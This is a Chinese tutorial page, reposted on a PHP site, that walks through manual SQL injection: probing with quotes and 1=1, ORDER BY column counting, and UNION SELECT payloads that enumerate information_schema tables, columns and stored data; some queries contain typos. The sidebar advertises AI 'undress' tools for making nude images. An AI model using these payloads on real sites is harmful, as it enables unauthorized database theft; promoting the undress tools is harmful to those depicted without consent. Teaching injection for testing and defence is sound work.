搜尋
首頁資料庫SQL一起聊聊簡單的sql手工注入過程

這篇文章為大家帶來了關於sql中手工注入的相關問題,其中包括判斷注入點以及判斷注入類型的相關問題,希望對大家有幫助。

一起聊聊簡單的sql手工注入過程

判斷注入點

1.單引號法:直接在網址後面加上一個單引號,如果頁面無法正常顯示,瀏覽器回傳一些異常訊息,則表示該連結可能存在sql注入漏洞

2.1=1和1=2:在網址後面的get傳參加上and 1=1 ,顯示正常,把1=1替換為1 =2,顯示異常,表示網頁存在sql注入。

判斷注入型別

1.數字型注入:注入變數的值不需要用引號引起來,如

select * from user where id=$id;

2.字元型注入:注入變數會用引號包裹起來,如`

select * from user where username='$username';`

注入時注意要閉合引號。
3.搜尋型注入:

select * from user where username like '%$pass%';

把sql語句建構成

select * from user where username like '%$pass%' union select语句 '%%';

即傳輸的變數為 pass%’ union select語句 '% 形成閉合。

判斷注入點提交方式

透過抓包等方式判斷注入點的提交方式是get,post,還是cookie。

使用order by 查詢字段

使用order by 語句可以查詢出資料庫有多少個字段,可以透過不斷的嘗試來確定資料庫字段數量,如在輸入oeder by 9時,頁面報錯而輸入order by 8時頁面顯示正常,即資料庫中有8個欄位。
如查詢語句為:select * from user where id='$id';
可以建構下面的輸入:(id = ') ' order by 3 ' --
即查詢語句為:select * from user where id='' order by 3 '--'

使用聯合查詢來查詢目前資料庫、使用者、版本資訊

使用union select 語句來查詢目前使用使用者user() ,資料庫database() ,資料庫版本version() ,伺服器作業系統的@@version_compile_os等資訊
version版本十分重要,如果版本在5.0以上,就可以使用information_schema函式庫輕易的查詢想要的資訊
建構語句:

select * from user where id='' union select user(),database(),version()+--+;

查詢目前資料庫中的表,列和值

#5.0 版本以上的mysql資料庫自帶的information_schema函式庫中儲存著資料庫中所有的表名和列明資訊。
下面我們就應該根據第五步驟查詢的目前資料庫的結果(如資料庫為database_1)名下所有的表名tables的資訊。
Information_schema.tables :記錄著資料庫中所有表名資訊的表。
建構的查詢語句如下:

Select * from user where id='' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database_1;--

查詢的結果為:第五步驟查詢的目前資料庫中的表名資訊。
Information_schema.columns:記錄資料庫中所有的表中的列名資訊;
下面就應該根據上面查詢得到的表名資訊(如表為table_1)查詢他的列名信息,建構語句如下:

Select * from user where id='' union selcet 1,group_concat(column_name),3 from information_schema.columns where table_name=table_1;--

查詢出列名後,就可以直接透過聯合查詢查出表中儲存的資訊(如查出的列名為column_1,column_2)建構語句

Selcet * from user where id='' union select 1,column_1,column_2 from tables;--

即可查詢指定資料庫指定表格的儲存資料

推薦學習:mysql影片教學

以上是一起聊聊簡單的sql手工注入過程的詳細內容。更多資訊請關注PHP中文網其他相關文章!

陳述
本文轉載於:CSDN。如有侵權,請聯絡admin@php.cn刪除
SQL Server使用CROSS APPLY与OUTER APPLY实现连接查询SQL Server使用CROSS APPLY与OUTER APPLY实现连接查询Aug 26, 2022 pm 02:07 PM

本篇文章给大家带来了关于SQL的相关知识,其中主要介绍了SQL Server使用CROSS APPLY与OUTER APPLY实现连接查询的方法,文中通过示例代码介绍的非常详细,下面一起来看一下,希望对大家有帮助。

SQL Server解析/操作Json格式字段数据的方法实例SQL Server解析/操作Json格式字段数据的方法实例Aug 29, 2022 pm 12:00 PM

本篇文章给大家带来了关于SQL server的相关知识,其中主要介绍了SQL SERVER没有自带的解析json函数,需要自建一个函数(表值函数),下面介绍关于SQL Server解析/操作Json格式字段数据的相关资料,希望对大家有帮助。

聊聊优化sql中order By语句的方法聊聊优化sql中order By语句的方法Sep 27, 2022 pm 01:45 PM

如何优化sql中的orderBy语句?下面本篇文章给大家介绍一下优化sql中orderBy语句的方法,具有很好的参考价值,希望对大家有所帮助。

Monaco Editor如何实现SQL和Java代码提示?Monaco Editor如何实现SQL和Java代码提示?May 07, 2023 pm 10:13 PM

monacoeditor创建//创建和设置值if(!this.monacoEditor){this.monacoEditor=monaco.editor.create(this._node,{value:value||code,language:language,...options});this.monacoEditor.onDidChangeModelContent(e=>{constvalue=this.monacoEditor.getValue();//使value和其值保持一致i

一文搞懂SQL中的开窗函数一文搞懂SQL中的开窗函数Sep 02, 2022 pm 04:55 PM

本篇文章给大家带来了关于SQL server的相关知识,开窗函数也叫分析函数有两类,一类是聚合开窗函数,一类是排序开窗函数,下面这篇文章主要给大家介绍了关于SQL中开窗函数的相关资料,文中通过实例代码介绍的非常详细,需要的朋友可以参考下。

Monaco Editor怎么实现SQL和Java代码提示Monaco Editor怎么实现SQL和Java代码提示May 11, 2023 pm 05:31 PM

monacoeditor创建//创建和设置值if(!this.monacoEditor){this.monacoEditor=monaco.editor.create(this._node,{value:value||code,language:language,...options});this.monacoEditor.onDidChangeModelContent(e=>{constvalue=this.monacoEditor.getValue();//使value和其值保持一致i

如何使用exp进行SQL报错注入如何使用exp进行SQL报错注入May 12, 2023 am 10:16 AM

0x01前言概述小编又在MySQL中发现了一个Double型数据溢出。当我们拿到MySQL里的函数时,小编比较感兴趣的是其中的数学函数,它们也应该包含一些数据类型来保存数值。所以小编就跑去测试看哪些函数会出现溢出错误。然后小编发现,当传递一个大于709的值时,函数exp()就会引起一个溢出错误。mysql>selectexp(709);+-----------------------+|exp(709)|+-----------------------+|8.218407461554972

springboot配置mybatis的sql执行超时时间怎么解决springboot配置mybatis的sql执行超时时间怎么解决May 15, 2023 pm 06:10 PM

当某些sql因为不知名原因堵塞时,为了不影响后台服务运行,想要给sql增加执行时间限制,超时后就抛异常,保证后台线程不会因为sql堵塞而堵塞。一、yml全局配置单数据源可以,多数据源时会失效二、java配置类配置成功抛出超时异常。importcom.alibaba.druid.pool.DruidDataSource;importcom.alibaba.druid.spring.boot.autoconfigure.DruidDataSourceBuilder;importorg.apache.

See all articles

熱AI工具

Undresser.AI Undress

Undresser.AI Undress

人工智慧驅動的應用程序,用於創建逼真的裸體照片

AI Clothes Remover

AI Clothes Remover

用於從照片中去除衣服的線上人工智慧工具。

Undress AI Tool

Undress AI Tool

免費脫衣圖片

Clothoff.io

Clothoff.io

AI脫衣器

AI Hentai Generator

AI Hentai Generator

免費產生 AI 無盡。

熱門文章

R.E.P.O.能量晶體解釋及其做什麼(黃色晶體)
2 週前By尊渡假赌尊渡假赌尊渡假赌
倉庫:如何復興隊友
4 週前By尊渡假赌尊渡假赌尊渡假赌
Hello Kitty Island冒險:如何獲得巨型種子
4 週前By尊渡假赌尊渡假赌尊渡假赌

熱工具

WebStorm Mac版

WebStorm Mac版

好用的JavaScript開發工具

MinGW - Minimalist GNU for Windows

MinGW - Minimalist GNU for Windows

這個專案正在遷移到osdn.net/projects/mingw的過程中,你可以繼續在那裡關注我們。 MinGW:GNU編譯器集合(GCC)的本機Windows移植版本,可自由分發的導入函式庫和用於建置本機Windows應用程式的頭檔;包括對MSVC執行時間的擴展,以支援C99功能。 MinGW的所有軟體都可以在64位元Windows平台上運作。

Dreamweaver CS6

Dreamweaver CS6

視覺化網頁開發工具

Atom編輯器mac版下載

Atom編輯器mac版下載

最受歡迎的的開源編輯器

SublimeText3 英文版

SublimeText3 英文版

推薦:為Win版本,支援程式碼提示!